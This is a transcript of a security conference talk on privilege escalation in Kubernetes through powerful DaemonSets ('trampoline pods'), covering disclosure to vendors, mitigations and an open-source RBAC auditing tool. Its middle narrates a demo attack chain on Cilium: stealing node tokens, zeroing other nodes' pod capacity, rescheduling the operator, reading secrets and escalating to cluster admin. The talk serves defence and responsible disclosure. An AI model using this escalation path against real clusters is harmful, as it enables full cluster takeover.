 Hello everyone, yeah, let's get started. So keep the session on time. So my name is Indy. I'm from Google I'm the moderator of this session. So it's my honor to introduce Yuval from Palo Alto Networks, talk about the Kubernetes security about the overpaved village containers Thank you. Can everyone hear me in the back? Yeah, awesome So I'm Yuval of Rami. Today we're going to talk about the trampoline pods and privilege escalation Kubernetes I'm pretty excited having done a Live talk in a couple of years So let's get started with me today was supposed to be Shaul Benchai He couldn't come at the end, but he was an equal part of making this research and a presentation So a bit about Shaul and myself. We are security researchers at Prisma cloud in Palo Alto Networks So we do vulnerability research and threat hunting in the cloud We look for security issues in the cloud ecosystem and we try to find the threat actors that are exploiting them We're also NBA fans and we made a couple of predictions for the conference finals when we made this talk got three out of four, right? I'm pretty happy about that And a bit about what we'll be discussing today So today we're going to discuss start off by discussing container escapes This threat that we keep hearing about and try to understand what's the real impact? What's the real blast radios? We'll then talk about the concept that we defined as a trampoline pods and see how they allow privilege escalation in Kubernetes in general But also in the most popular Kubernetes platforms out there based on a case study that we've been conducting in the last couple of months We'll then talk about some recommendations on how you can address privilege escalation in Kubernetes and we'll finish it off with the Arbac police which is an open-source tool we now Releasing that can help you address privilege escalation Okay, so container escapes obviously containers are great for packaging and deploying software, right? That's why we all use them But they're not the strongest security boundary mostly because of the assured kernel and we can expect that container escapes are likely to continue to happen Only in 2022 we had at least six vulnerabilities both in a kernel and in container run times that would have allowed for container escape But containers can also escape because of a misconfiguration, right? The most well-known one is a privilege containers And they're threat actors in the wild. They're actually trying to capitalize on those issues and Escape containers to spread in the victims environment So if if we understand that container escapes are a threat that's exactly gonna stay It's really important to discuss the impact And in Kubernetes at least the obvious impact is a compromise node, right? The attacker previously had access to only one pod But now he escapes and he has access to all of the neighboring parts on that node So possibly more business logic and he also has access to more compute resources, right? All of the CPUs the memory of the node But if you can expect our attacker to be an ambitious one, he might not be satisfied with just the note He might want to take over the entire cluster and that's the question that we're going to try to Answer today Does a single container escape allowing attacker to take over the entire cluster and become cluster admin? And that's going to be the guiding theme for all this talk now Just to clarify what we mean by admin Basically the attacker can do every single operation in all namespaces. So complete control over the cluster We're also going to use another term which is admin equivalent Basically meaning that the attacker has a permission that within one or two trivial steps allows him to become cluster admin So in this example, it's the least secrets permissions so In order to understand what's an attacker on a compromise node can do in it We need to talk about what credentials exist on a compromise node So first of all, we have the cubelet credentials, right? The cubulator is the node agent He obviously has a set of permissions to allow it to operate his node But thankfully kubernetes have mostly dealt with attacks that originate from the cubelet credentials Using two components the node the authorizer and the node restriction And what those do is make sure that the cubelet can only access resources that are already Existing on the node. So for example the pod to run on that node And it's actually a really good cube con talk from a few years ago that described that effort So the bottom line is that the cubelet permissions the default permissions of the node They wouldn't allow an attacker to become cluster admin. They are useful for some low-impact attacks or like Reading a certain objects in the cluster or launch a denial of service attack But if we are asking about can a compromise node become cluster admin, they're not that relevant But they're not also host a different type of credential is it also hosts the neighboring pods service accounts token, right? And their permission vary. We really don't know it. It depends on the node. It depends on the pods that it's running But the bottom line is that for an attacker the permissions that are interesting Are the actually the pods permissions because the cubelet permissions are going to be the same Static and restricted set of permissions, right? But pot's permission might be they might be not powerful at all But also they might be very powerful. So those are really the interesting permissions for an attacker now Today we're going to see Scenarios where pods actually have a lot of permissions where they are very powerful and we try to name that That concept and the name you gave them is a trampoline pods Basically pods that would allow an attacker to jump around the cluster Reach higher privileges and basically have some fun in your cluster Now the obvious question is okay. Are those kind of pods common? Where do they come from and to answer that we need to discuss What kind of pods run on a typical average low node, right? So obviously you have application pods the the the things that you're actually running your cluster in order to host You probably also have a bunch of add-ons. So you might be running promidius for login Or a Istio for service mesh or opa gatekeeper for policy enforcement and the list goes on and There are also another group of pod which we named the system pod. You may have may also refer them as infrastructure pods Those group of pods that normally sit in cube system and are already there when you create the cluster, right? And they vary between different managed services between different distributions But common example would be a cube proxy or core DNS And if we try to understand which one of those group of pods could be Trampoline pods could be powerful. We see that system and add-on pods are actually a bit of a blind spot permission wise Because we don't configure their permissions, right? For add-ons, we simply we normally just install a helm chart which actually configures the add-on permissions and For system pods, you know, they were there when the cluster were created. Obviously, we didn't configure their permissions Another interesting things about about those two sets of pods is that they often run as demon set meaning they run on every single node in your cluster And that really matters if they're powerful Because you can imagine that if a trampoline is not deployed as a demon set, for example as a deployment, let's say That only specific nodes in the cluster are going to be able to escalate privileges, right? And an attacker that escaped might very well not be on a node that hosted trampoline But with trampoline demon set every single node in the cluster hosts powerful credentials hosts powerful tokens, right? So an attacker that escapes a container is actually guaranteed to find valuable credentials on the node So if we try to answer Whether container escape actually equals cluster admin those are the types of trampolines that we want to look into because they can ask they can provide us with definitive answers, right? So we kind of skimmed over a part which is defining trampolines We said the trampoline pods are basically pods with powerful permissions, but what are powerful permissions in Kubernetes? That's a question. We try to answer when we did this research And when we try to answer that answer that question We saw that there is actually no public list of powerful permissions and that's quite surprising because That's crucial in order to understand really important and to answer really important question like is my publicly exposed pod Powerful and can escalate privileges is this add-on that I'm about to install actually installs admin equivalent or risky permissions So what we tried to do our approach to tackle this was to first define Interesting attack losses that even permission can actually carry out That makes it powerful and then we actually went over all of the permissions and try to map them into those attack losses So let's let's talk about the attack losses that we identified in Kubernetes that could actually be interesting The first is permissions that allow you to manipulate Authentication or authorization for example to change your identity or your permissions and a very obvious Example would be the permission to impersonate other users Then you have permissions that allow you to acquire service account tokens either Retrieven existing one or issue a new one For example, the least secrets permissions allow you to retrieve existing service account tokens, which are saved as a secret Then you have permissions that allow you to execute code on either on on pods in the cluster or nodes in the cluster So for example the permission to create pods slash exact is actually what allows you to do cube catalex Then you have a an attack last the time. I'm really excited about which is still pause Basically attack the permissions that allow you to move an existing pod from one node to another and why would you want to do it? If we assume that we already compromise the node there might be interesting pods that we want to Bring to our node either because they host interesting business logic or in our case Because they host powerful permissions. They have a powerful service account So if we bring them over to our node, we can then exploit their service account Finally an attack last that we're not going to get into too much is medler in the middle also known as a man in the middle Permissions that allow you to intercept traffic and the reason we are not going to get into it is because the impact It's not a reliable attack, right? You can't reliably use many in the middle in Kubernetes to escalate privileges. You might but we are looking for reliable attacks Now we looked at the permissions in Kubernetes and we try to classify them based on those attack classes We're also going to release a report alongside this presentation Which details for each permissions how it enables the attack, but we don't really have time to go over each one of them It's important to know that these likes likely aren't all of the powerful permissions, right? But we think it's a good start so back to a question of What makes a trampoline trampoline pods are pods that have permissions to either manipulate authorization or authentication acquire service account tokens execute code on pods or nodes Or still pods Because those permissions get you a real shot at becoming cluster admin So let's do a quick recap because we went over a couple of subjects So we start off and I said that container escapes are likely going to continue to happen and the main The main thing that dictates their impact is whether a powerful pod a trampoline exists on the node and we defined what a trampoline is We also discussed how trampoline demon set install powerful pods into every single node in the cluster So if you want to answer whether container escape actually equals cluster admin the question We are looking for is our trampoline demon sets installed who installs them and how common are they? And that's really the question that we try to answer doing this research We look at the most popular Kubernetes platforms and trying to find trampoline demon set and understand their impact on the platform So we focused on mostly on a infrastructure platform So manage Kubernetes services and distributions like EKS GKE AKS and OpenShift and we also look at container network interfaces like a Calico, Cilium and Treya and we've net and The idea behind it is that infrastructure components are more likely to deploy a demon sets and When we looked at those platforms and search for trampoline demon sets and we found that most of them actually installed them 62% 62 and a half to be exact in stone powerful demon sets by default and In this table you can actually see for each platform whether it installed powerful demon sets Which are those powerful demon sets and what were their powerful permissions again? Where there is a report that with more details. We are not going to get into each platform now So based on those trampoline demon sets based on their permissions We try to evaluate whether container escape actually equals cluster admin in those platforms And in half the platform based on the trampoline demon sets it did in another 25% of platforms There were some prerequisites and In another 25% it didn't now This is a breakdown of whether container escape actually equals cluster admin in each one of those Platforms you can see that we detailed the attack based of the attack lessons that Are actually in part of that of getting the cluster admin and for Platform that had really powerful trampoline demon sets the attack is pretty short But for ones where they were not that powerful the attack took a few steps Now a lot of you are probably using those platforms So I just want to say there's no need to panic right there is a large prerequisite here For an attacker to abuse trampoline demon set They first need to take over your pod and then escape it and there are a lot of best practices and hardening that can deny it and a lot A lot of those platforms that I mentioned already Remove powerful permissions from their demon sets That being said if you run multi-tenants cluster you in a different scenario and you really should look into that Even you should really be a bit more alert about that Okay, so that was a lot of theory. Let's see how an attack looks like so we obviously don't have time to Go over every single platform and every attack in every platform We chose Celium mostly because it showcases a number of attack classes and also Celium maintenance Did a great job of releasing fixes and back porting them So What's the scenario with Celium? Celium installs two interesting components. One is the Celium demon sets a trampoline His permissions are to delete pods and to update the status of nodes And those two actually allow you to steal pods and we'll see how in a minute Then we have the Celium operator deployment which can actually list secrets and by that acquire service account tokens now in this attack we are starting from Like how we started from the rest of the of this talk we compromise the node, right? And we want to become cluster admin. Obviously, we chose the weakest node so the node not hosting the Celium operator and our Approach to do that would be to first use the Celium demons and permissions to take over the Celium operator and Then use his permissions to get cluster admin So I'll just take a sip of water before we start that Okay, I'm ready so The first step in the attack it would be to make other nodes unschedulable And we do that by overriding the pod capacity in their status to zero This we do that using the update node status permission The second step in the attack would be to actually delete the Celium Operator now when that happens Kubernetes will try to reschedule it and because all of the nodes are unschedulable It has to land on our node. So we successfully stolen the Celium operator pod Now the next step in the attack would be to use his is least secret permissions to actually retrieve a Service account token for a built-in powerful service account that service account the service account that we chose is the cluster all aggregation controller or crack For short because he can actually manipulate permission by modifying cluster roles The first step of the attack would actually to use that crack token to modify our own permissions and simply grant our self The entire permissions in the cluster So again, the steps are first to Steal the Celium operator use his permission to acquire a powerful token and then use that powerful token that admin equivalent token To get our to get all of the permissions in the cluster now. We are going to see a demo I know those were only three steps, but when you translate them to cube cattle commands, it's a lot So it's going to be quite quick And but if you don't if you can follow every command, that's okay We're gonna have a like a walkthrough afterwards as well So let's start we are in a cluster that installed Celium, right? And the first thing we do is we emulate a container escape What I'm doing now is I'm installing a script that can actually Find service account token in the file system and then configure cube cattle to use it to use that token So just to make it a bit easier And we are going to use that script to get the Celium Demons and token Now we can see that it's the Celium Demons that because when we try to do it forbidden Forbidden operation we can see that we are identified as the Celium Demons set Let's see our target. We want to steal the Celium operator and we can see that he is Hosted on another node in the cluster. It's not our node So the first step is we try to steal it How are we doing that? We are going to change the port capacity of the other nodes in the cluster to zero So we are now defining a bash function that actually uses cube cattle proxy to modify The status of a node using a JSON patch And you can see that what we do the operation is to replace the port capacity and The new value would be zero almost there Got it and now we're going to use that function to Set the port capacity of the two other nodes in the cluster To zero and we do it in a loop because Kubernetes actually corrects the value Now the two other nodes in the cluster are unschedulable So we can actually delete the Celium operator and if it all goes well It should be recreated on our node and we can see that it does the node name is highlighted in red and you can see that it's a different Pod name from the one that we deleted The next step in the attack would be to use is the Celium operator permissions to get cracks token Right, so we configure ourselves the queue we configure cube cattle to use Celium operators permissions And we can see that we can actually now retrieve secrets in the cluster So we are targeting the service account token secret of the cluster or aggregation controller and Here I'm making a type or so that doesn't work But now it should and we got the token and we're going to configure a cube cattle to use it So now that we have the token we can actually modify cluster all cluster roles in the cluster We are not yet the cluster admin as you can now see But we are now going to actually change our permissions So we are now using cracks token to modify our permissions By modifying the cluster wall that is binded To the crack service account So as you can see this is the cluster all of the crack service account You can now escalate cluster roles, but we are going to change it a bit. We're going to make it full cluster admin Also, and now when we check the permission of crack We can see that we can actually do every single operation in the cluster in all namespaces. So we basically Achieved our goal from a single compromise node to become cluster admin So what attack classes this would just see in their demo we've started off by stealing a pod right still in the steelium operator Pod we then used his permissions to acquire a powerful service account token And finally we use that service account token to manipulate our authorization our permissions To get class around me So this is just how the attack classes that we discussed earlier map to an attack Some final remarks on psyllium psyllium actually fixed all of those issues none of those powerful permissions remain And obviously other platforms had similar attacks. We just needed to demo something like we just needed to choose one to demo The demo targeted the psyllium see a line installation, which was the default installation method when we looked at it But psyllium is actually a special case, but there is a Too popular installation method also via helm and via helm the permissions are slightly lower So the impact is lower We don't have I don't have time to like get into that But if you want if you use psyllium with helm and want to understand you can see our report So let's talk about what platforms did when we disclose Those trampoline demons it's to them We disclosed our find is every single trampoline demons that we found between December 21 to February 22 and It was really a great disclosure experience all around all of the platforms were really cooperative and Understood the issue and wanted to resolve it Some approaches that platforms took to fix this issue I think it's quite interesting the first was simply to strip excessive or are needed permissioned or to just scope down certain permissions Another approach that we saw is to move functionalities from demon sets that run on every single node in the cluster To deploy makes it only run on a few or to the control plane in the case of managed services And Finally a couple of platform actually released admission policies for example Similar to op agate keeper for example that actually prevent misuse of those problematic demon sets So they scoped down the operation that the demons and can actually do Now you can see that there was a really good trend in just a few months So I think it really speaks well to the commitment of their platforms that we meant mentioned here to resolve the issue From 62 and a half percent now only 25 percent run from pulling demon sets and a really similar thing happened With the impact of container escapes Now it's worth mentioning that this talks about the impact of container escapes do to Do to Kubernetes native attacks if any platforms has some platform specific attacks. We obviously didn't look into that This is a breakdown of the fixes in each platforms And some things to mention are probably Open-shift as it turns out Just by random they were the last Platform that we disclosed to and they really had a lot of things to fix and they really did a great job with that And it's fix are going to get released In the next version a Google also gave us a bounty for this finding which was quite nice of them So let's talk about what you can do to actually solve this kind of privilege escalation whether you are a Kubernetes user your own clusters or maybe you're a maintainer of a Kubernetes projects because obviously we didn't cover So many other projects that people also in commonly install into their clusters So first of all obviously if you get we need to follow the principle of least privileges so When you can try to scope permissions to specific namespaces or to specific resource names And it's really good to take a look at your Kubernetes manifest and your helm charge to see what kind of permissions are you asking for at the moment a lot of time when we are Just starting a project or starting a Deployment we often give broad permissions just to make sure that everything works and those stairs legacy even though that are not needed It's really important to understand your abac posture if you run Kubernetes Like you should be able to say those are the powerful pods in my cluster. Those are the ones that can actually escalate privileges if you are Maintaining a Kubernetes project. It would be great if you can actually document the powerful permissions that you are installing into a cluster Now once you have identified the powerful permissions in your cluster, and if they don't run as demon sets it's its best practice to isolate them from publicly exposed or untrusted Pods in your cluster and you there are a couple of scheduling mechanism that you can actually use to do that And now to discuss trampling demon sets obviously we saw how they degrade the security of a cluster So when you can try to remove them you can move privilege functionality from Demon sets to non demon set Components of your platform or your cluster or right actually you can move them to to the control plane if you have control over the control plane Now you can also minimize right permissions of the core objects like pods and odds by by storing state in a config maps or in a CRD's and Finally, it's not really a question of drop everything or drop nothing, right? Drop the permissions that you can it's still much better if a demon set that Could previously acquire tokens can now only launch many in the middle attacks, right? So it's a what it's it's a step-by-step progress Finally, you can also use Admission policies when some permissions are hard to remove to actually scope down what a certain demon set can do And we have some more data on that and examples for that in our report Okay, so we discussed about what to do when you want to address powerful permissions But when we looked at this issue, we found that it's quite hard to identify powerful permission in the cluster We don't have a lot of automated tool. So we wrote one and we named it our back police What our police does it retrieve? the permissions of pods service accounts and node in your cluster and then evaluates them based on Polices written in a ego. So out of the box, we have 20 policies for each of those powerful permissions That we mentioned so you can simply run our back police and see which are the powerful pods in your cluster But it's also customizable like you can search for every pattern that you'd like to in Kubernetes our back And here's an example of how the output looks you can see that This shows ciliums of the cluster that we just saw and it shows that cilium can actually modify pods So it alerts on the specific surface account in specific pods in the cluster that are actually powerful I really recommend to try it it takes like a couple of seconds and it gives you a lot of insight in you into your arbot posture some final thoughts So the bright side is that issues are getting Subflare and my right a few years ago issues were not complex to Exploit and they had a lot of impact and you can see that here. They're actually a big prerequisite of compromising the node The one downside though is that we can have some false confidence because of that Like you might have a cluster that passes all of the sys benchmarks on all of the best practice benchmarks But you might not be aware that you're a single container escape away from your whole cluster being compromised and one way to address this those kind of issues is to Tackle vague areas in a Kubernetes security We tried to do that in this talk for two main questions that we felt like didn't have good answer to Like which permissions are actually powerful and what's the real impact if container escapes The main the main point is that Kubernetes is complex enough and when we can we should try to Research those type of issues and try to really document and make their impact public So with that here's a link to our report Here's a link to our book police, and I'll be happy to take any questions. Thank you. Well, yeah, thank you for your discovery I think our team was be the last couple months to fix all the issues So here are a couple questions from Q&A online first one is Why does multi-tenant scenario increase the chance of escape equals to admin? and they don't That's a good question. They don't really increase the chance of container escape Equal in cluster admin, but they do increase the chance of container escapes because there is more chance that you have a Malicious tenant for example, so that's what I meant by that And the other question. Oh, yeah, the other question I can answer the Report the report link is on the screen right now. So you can scan it. So another question is So the least privileged paradigm is still need more attention So to raise the bar a little bit. Do you think a zero privileged implementation is feasible for Kubernetes? That's a really good question. I don't think we can come to a situation where every single node in the cluster for example doesn't host powerful credentials But we can definitely arrive at the point where most nodes in the cluster don't host powerful privileges and that's really What we're driving here. I think the opposite of that is the current situations where in a lot of clusters every node in the cluster Has powerful credentials on it and that's really not good for your security Yeah, so thank you, you are I think we can have some questions. I mean here Thanks say Roman Prokofiev here. I have a question about this are back police It as you showed as you showed it shows some dangerous permissions some Bad stuff that could happen to the cluster, but it's already in the cluster, right? We'll have been discussing it here with the colleagues. It was the colleague if it is possible to integrate with some sort of pipeline to Find out if these permissions would be appearing into the cluster after some of the changes For instance, we have lots of pipelines for different help charts. It would be nice to know that some sort of helm apply would Sorry, how I mean store helm upgrade would cause the bad perm that that box would cause the bad permissions to be in the chat But not actually having them That's an awesome question. We actually discussed the same we had this in the presentation earlier But we didn't really have a time to to get to that and we have check off which is open source IFC Scanner which can actually scan for misconfigurations and we just contribute you the couple of a RBAC policies And and we expect to contribute more in the future So we are we are aiming for using this tool to tackle that the issue that you presented of Finding powerful issues powerful permissions before they're deployed to the cluster. Hey, oh hi. I'm a New Jeff from extension DevOps in the UK just got a question It might be a bit simple on how effective it would it be to just completely lock down your network Like your networking within the cluster and only enable pod-to-pod communication through network policies So you mean that lock down the net the communication between nodes is that there? Um, oh, I just meant between. Oh, so this was what we were talking about the between nodes Networking I was talking about just between pods So if you completely lock down your pod, right and someone uses it as a trampoline pod and can't technically Network out, but then I guess yeah, maybe you're talking about you then access access node networking and I missed that Thanks, so I'm not sure I heard everything but if I understood correctly Locking down networking specifically between pods is that so because of most of the attackers are actually carried out From the compromise node to the API server and that line of communication is actually essential There isn't much you can do about that But obviously looking down networking like external networking and looking down pod-to-pod communication when it's not needed That could help you from preventing the initial compromise, right? Hi, hello I'm working on adding user namespaces support to the cubelet, and I was wondering if most pods at least the compromise pod runs in a user namespace and And that user namespace is on every part in the host run as a different you ID in the Yeah, in the host names namespace Like would it be possible to compromise the service accounts as you cannot read them because you're different UIDs Would that help in this case? Obviously you user names that's a really good question Obviously user namespace help a lot with container isolation. So their job would be to prevent the container escapes and Then again user namespaces alone, I wouldn't like rely only on that but if you have a more powerful sandboxing solution like Let's say Qatar containers or G visor and there there is actually that actually does sandboxing to a higher degree and then It's it's less problematic to have Powerful pods next to let's say public publicly expose one. It's still not Perfect, but to your question. Yes, user namespaces do help obviously with every container isolation Hi, I Was wondering about two potential well one mitigation of one possible design Whether something like Talos like a very minimal node with no shell. How much would that? Kind of help against this attack and then also in Kubernetes if service accounts were a separate resource to secrets What can you see that offering any benefit to these types of attacks as well? So I think there are two question one was related to Removing binaries from the node removing the shell right and the second was about service accounts not being secrets. Is that there? So I'll actually start with the second question. So there's actually now a Kubernetes enhancement proposal that's just landed in 124 where Service account tokens are not automatically created as their secrets for a new service accounts. So that obviously Reduces the impact of one powerful permission the least secret permission But you should know that I don't think that in twill 126 Existing service account tokens would be removed from secrets for your question about the Removing binaries from nodes obviously that like it's a good hardening I don't think it's like something that can stop this completely and I and I think it's also a bit hard to implement that But yeah, I think for the future a lockdown node is definitely Interesting to look into and I know AWS tries to do something like that with a bottle rocket for example Yeah, thank you. I think we are right out of time if you have more questions feel free to email you all and You can connect connect with him through the Cooper Khan platform. Thank you. I want to give him another plow